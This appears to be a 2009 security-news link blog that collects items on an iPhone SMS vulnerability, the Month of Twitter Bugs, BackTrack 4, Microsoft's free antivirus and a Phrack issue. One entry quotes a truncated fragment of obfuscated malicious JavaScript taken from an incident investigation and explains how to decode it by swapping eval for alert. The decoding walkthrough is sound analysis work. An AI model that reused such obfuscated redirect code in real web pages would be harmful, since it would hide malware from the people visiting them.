The Edge of I-Hacked

from V3.co.uk - formerly vnunet.com

Security experts are warning of a serious vulnerability in the iPhone that could allow hackers to remotely execute code on the device.

Security researcher Charlie Miller announced the findings at the SyScan conference in Singapore yesterday. He is now reportedly working with Apple to get the problem fixed as soon as possible.
Advertisement

Patrick Runald, chief security advisor at Finnish web security firm F-Secure, argued on the firm’s blog that the vulnerability, which exploits a weakness in the way the device deals with text messages, is “as bad as it gets”.

“The vulnerability seems to allow unsigned code to run, which circumvents a core part of iPhone’s security model,” he wrote. “It’s usually only able to run signed code, i.e. apps that have been approved by Apple. No user interaction is required, which is unlike current mobile malware.”

The vulnerability could enable hackers to remotely turn on the GPS function to monitor the handset’s location, or turn the microphone on to listen in on conversations, Miller is reported as saying.

Apple will be hoping it finds a fix for the vulnerability before Miller discusses the flaw in greater detail at a planned Black Hat presentation.

It has been a bad week for the iPhone. Supplies have been running out in parts of the US, and the blogosphere has been awash with claims that the new 3GS model is prone to overheating.

I hereby declare that WED JULY 1st is Twitter Security Day (#twittersec). I do so with good reason. As it stands, the guys at http://twitpwn.com/ have declared July the “Month of Twitter Bugs” (MoTB). Taken from their site:

Today, three years after the “Month of Browser Bugs”, I’ve decided to declare July 2009 as “Month of Twitter Bugs” (MoTB). I’m doing so in order to raise the awareness of the Twitter API issue I recently blogged about. MoTB could have been easily converted to any other “Month of Web2.0 service bugs”, and I hope that Twitter and other Web2.0 API providers will work closely with their API consumers to develop more secure products.
Each day I will publish a new vulnerability in a 3rd party Twitter service on the twitpwn.com web site. As those vulnerabilities can be exploited to create a Twitter worm, I’m going to give the 3rd party service provider and Twitter at-least 24 hours heads-up before I publish the vulnerability.
Even though I have enough vulnerabilities for this month, you are more than welcomed to send me (via email or twitter) vulnerabilities you find in 3rd party Twitter services. I will do my best to publish all submitted vulnerabilities. I will, of course, credit the submitter.

So what does #twittersec mean? What should you do?

Simple: On Wed, July 1st CHANGE YOUR TWITTER PASSWORD.

How many times have you given your twitter password to a third party site? Did you change your password after you did that? Well, if not here is a good time to do so. Yes, it is true that changing your password doesn’t invalidate all of the “MoTB” however, it could help stop a few. And really, it is probably time that you do it anyways, don’t you think?

Even more importantly #twittersec’s goal is to raise awareness to the “MoTB” and to put pressure on the developers to fix the vulnerabilities in these third party apps.

Please help spread the word about Month of Twitter Bugs and #twittersec day!

from Core Security Technologies

Register below for this free webcast on Tuesday, June 30, 2009 at 2pm EDT / 11am PDT GMT -4:00, New York. Upon registering, you’ll receive an email confirmation containing teleconference and login information. A recording of the webcast will be sent to everyone who registers, so be sure to sign up even if you can’t make the live session.

About this webcast:
The most effective web application pen testers expose the risks that vulnerabilities pose to the business, rather than just to the application itself. “The Art of Combining Web Pen Testing Techiques” series explores the art of replicating web attacks that take advantage of multiple vulnerabilities, revealing greater business risks than would be possible by simply analyzing vulnerabilities on an individual basis.

In this first webcast of the trilogy, Kevin Johnson and Ed Skoudis will discuss SQL and content injection. We will look at a number of powerful tools to assist in discovering these flaws, in addition to making exploitation simpler.

The webcast will also outline and run through a real-world scenario that demonstrates how these tools and attacks can be used directly in a penetration test. The scenario will illustrate the use of SQL injection to insert content on a website that will, in turn, give the tester full control of the selected in-scope browsers and systems that access the target site.

Microsoft Security Essentials Beta Home
If you are running Windows (XP, Vista, Windows7 32/64bit) then you can now download Microsoft’s “Microsoft Security Essentials” for free. Limited downloads, so get in on it now if you are interested.

via iPod and iPhone Firmware Download.

For those of you who dont want to pay for the $9.99 Update to your Ipod Touch.. You can download the firmware from here.

Simply select your model of ipod, and download the firmware image. After downloading the desired firmware, you can shift-click PC or option-click Mac the Restore or Update buttons in iTunes. A file dialog will open and let you choose the downloaded ipsw-file.

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible.

Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie.

We’ve opened up new subforums for this release. Please report bugs and suggestions

As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf.

If you would like to link to our iso, please use :

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated.

Enjoy

Remote Exploit Team

via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.

Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening html file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain. (that cant be good)

However when viewing the source of the html page, he was presented with a fairly common technique often called “Encrypting HTML” which really should be considered “Obfuscating HTML” because all that the programmer has done is converted “human readable” code into “Human-Unreadable, yet Browser-Readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel very clever.. Re-write eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When loaded into a browser, the BROWSER to translate the obfuscated code into human readable form, and give it to you in a nice alert box allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch.. But if you are using firefox I suggest you should check out JavaScript Deobfuscator

via Network World.

A beta version of Microsoft's free antivirus software - codenamed Morro - will soon be available from the company's website, according to a report.

Reuters says Microsoft employees are already testing the software ahead of a broader rollout in the near future. The company declined to provide a specific date for Morro's release, but said the trial version would be available “soon”.

Power of One - Global Visibility & Control at the Velocity of Business Change: Download now

Microsoft announced its plan to replace its Windows Live OneCare security software with a free antivirus product last November.

The company said at the time that Morro would help encourage more people to take antivirus seriously, claiming nearly 50 percent of Windows users don't have an antivirus tool installed on their PC.

.:: Phrack Magazine ::..

0×01 Introduction
0×02 Phrack Prophile on The PaX Team
0×03 Phrack World News
0×04 Abusing the Objective C runtime
0×05 Backdooring Juniper Firewalls
0×06 Exploiting DLmalloc frees in 2009
0×07 Persistent BIOS infection
0×08 Exploiting UMA : FreeBSD kernel heap exploits
0×09 Exploiting TCP Persist Timer Infiniteness
0×0A Malloc Des-Maleficarum
0×0B A Real SMM Rootkit
0×0C Alphanumeric RISC ARM Shellcode
0×0D Power cell buffer overflow
0×0E Binary Mangling with Radare
0×0F Linux Kernel Heap Tempering Detection
0×10 Developing MacOSX Rootkits
0×11 How close are they of hacking your brain ?

via MacBook Pro 13″ Unibody Teardown.

We got our hands on a MacBook Pro 13″ Unibody and decided to compare it to a MacBook Unibody — from the inside! Follow us on twitter to get all the latest updates as we're doing the teardown!